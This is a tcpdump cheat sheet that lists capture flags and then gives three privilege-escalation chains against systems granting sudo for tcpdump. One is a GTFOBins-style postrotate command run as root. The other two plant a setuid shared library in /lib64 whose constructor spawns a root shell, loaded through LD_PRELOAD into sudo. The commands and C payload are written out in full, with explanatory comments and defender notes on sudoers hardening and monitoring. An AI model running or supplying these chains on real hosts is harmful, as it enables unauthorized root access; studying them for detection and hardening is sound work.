TCPdump#
tcpdump flags#
-l Make stdout line buffered. Useful if you want to see the data while capturing it.
-n Don't convert host addresses to names. This can be used to avoid DNS lookups.
-i interface
-w write raw packets to file
-W will limit the number of files created to the specified number,
and begin overwriting files from the beginning, thus creating a 'rotating' buffer.
-G rotates the dump file specified with the -w option every rotate_seconds seconds.
-z Used in conjunction with the -C or -G options, this will make tcpdump run "postrotate-command file", where file is the savefile being
closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2.
-Z If tcpdump is running as root, after opening the capture device or input savefile,
but before opening any savefiles for output, change the
user ID to user and the group ID to the primary group of user. This is the flag the snippets below rely on: -Z root keeps the -z postrotate command running as root, while -Z $USER makes the output savefile owned by the unprivileged caller.
Classic GTFO Bin#
# GTFOBins-style abuse of a sudo rule for tcpdump. No real traffic is needed:
# -i lo / -w /dev/null discard the capture, -G 1 rotates the savefile after
# one second (with -W 1 limiting it to a single file), -z runs $TF as the
# postrotate command, and -Z root stops tcpdump from dropping privileges
# first, so COMMAND executes as root. 'id' is just the proof of execution.
# Defender notes: a sudo rule for tcpdump that does not pin the argument
# list (in particular -z/-Z) is equivalent to granting a root shell. Prefer
# file capabilities (cap_net_raw, cap_net_admin) on the binary over sudo,
# and alert on sudo-invoked tcpdump whose arguments contain -z or -Z.
COMMAND='id'
# The command is staged in a mktemp file (no shebang) and must be executable,
# because tcpdump execs it as "postrotate-command file" on rotation.
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
Fancy Exploit#
inline
# One-line form of the chain shown expanded below. sudo tcpdump ... -Z $USER
# drops to the calling user before opening the savefile, so /lib64/libvirt.so
# is created owned by an unprivileged user inside a root-only directory;
# timeout 1 ends the capture, the file is replaced with a compiled
# constructor library (unlink of itself, setuid(0)/setgid(0), exec of
# /bin/sh), chmod 6755 marks it setuid, and LD_PRELOAD=libvirt.so sudo loads
# it into a setuid binary — ld.so honours LD_PRELOAD in secure-execution
# mode only for setuid objects found in the standard search directories,
# which is why both the location and the mode matter.
# Defender notes: do not grant sudo for tcpdump at all; file-integrity
# monitoring on /lib64 (and the other loader search directories) should
# treat any non-root-owned or setuid shared object as a high-severity
# indicator, and sudo logs showing tcpdump with -w pointing outside a
# capture directory deserve an alert.
timeout 1 sudo tcpdump -i eno49 -w /lib64/libvirt.so -Z $USER port 31337 2>/dev/null; echo 'void __attribute__((constructor)) init() { unlink("/lib64/libvirt.so"); setuid(0); setgid(0); execl("/bin/sh", "/bin/sh", "-i", 0); }' > ~/payload.c; gcc -w -fPIC -shared -o /lib64/libvirt.so ~/payload.c; rm ~/payload.c; chmod 6755 /lib64/libvirt.so; LD_PRELOAD=libvirt.so sudo
expanded
# Expanded (identical) form of the inline chain. Step by step: the sudo'd
# tcpdump is told to drop to $USER (-Z) before it opens its savefile, so the
# file it creates at /lib64/libvirt.so ends up owned by the unprivileged
# caller in a root-only directory; timeout 1 kills the capture; the file is
# then overwritten with a gcc-built shared object whose constructor unlinks
# the library, calls setuid(0)/setgid(0) and execs an interactive /bin/sh;
# chmod 6755 sets the setuid bit so the dynamic loader will accept it via
# LD_PRELOAD even for a setuid target such as sudo.
# Every line below is joined by a trailing backslash, so no comments can be
# placed inside the command without changing it.
# Defender notes: the durable fix is not to expose tcpdump through sudo
# (use file capabilities or a dedicated group instead). Detection
# opportunities: sudo log entries for tcpdump with a -w path under a
# library directory, new or non-root-owned files appearing in /lib64, and a
# setuid-bit shared object anywhere on the loader search path.
timeout 1 \
sudo tcpdump -i eno49 -w /lib64/libvirt.so -Z $USER port 31337 2>/dev/null; \
echo \
'void __attribute__((constructor)) init() {
unlink("/lib64/libvirt.so");
setuid(0);
setgid(0);
execl("/bin/sh", "/bin/sh", "-i", 0);
}' \
> ~/payload.c; \
gcc -w -fPIC -shared -o /lib64/libvirt.so ~/payload.c; \
rm ~/payload.c; \
chmod 6755 /lib64/libvirt.so; \
LD_PRELOAD=libvirt.so sudo
Fancy Different#
# Variant of the LD_PRELOAD chain that lets tcpdump terminate on its own:
# -G1 -W1 rotates the savefile after one second and limits it to a single
# file (so no timeout wrapper and no port filter are needed — behaviour of
# -W with -G should be confirmed against the installed tcpdump version).
# Everything else is the same: -Z $USER makes the sudo'd tcpdump create
# /lib64/libvirt.so owned by the unprivileged caller, the file is replaced
# by a constructor library that unlinks itself and execs /bin/sh as uid 0,
# chmod 6755 adds the setuid bit the loader requires for LD_PRELOAD in
# secure-execution mode, and sudo is used as the setuid host process.
# The whole command is one backslash-continued line; comments cannot be
# interleaved without altering it.
# Defender notes: remove tcpdump from sudoers (grant cap_net_raw /
# cap_net_admin instead); monitor library directories for non-root-owned
# or setuid shared objects; alert on sudo tcpdump with -Z set to a
# non-root user or -w pointing outside a capture directory.
sudo tcpdump -i eth0 -Z $USER -G1 -W1 -w /lib64/libvirt.so 2> /dev/null; \
echo \
'void __attribute__((constructor)) init() {
unlink("/lib64/libvirt.so");
setuid(0);
setgid(0);
execl("/bin/sh", "/bin/sh", "-i", 0);
}' \
> ~/payload.c; \
gcc -w -fPIC -shared -o /lib64/libvirt.so ~/payload.c; \
rm ~/payload.c; \
chmod 6755 /lib64/libvirt.so; \
LD_PRELOAD=libvirt.so sudo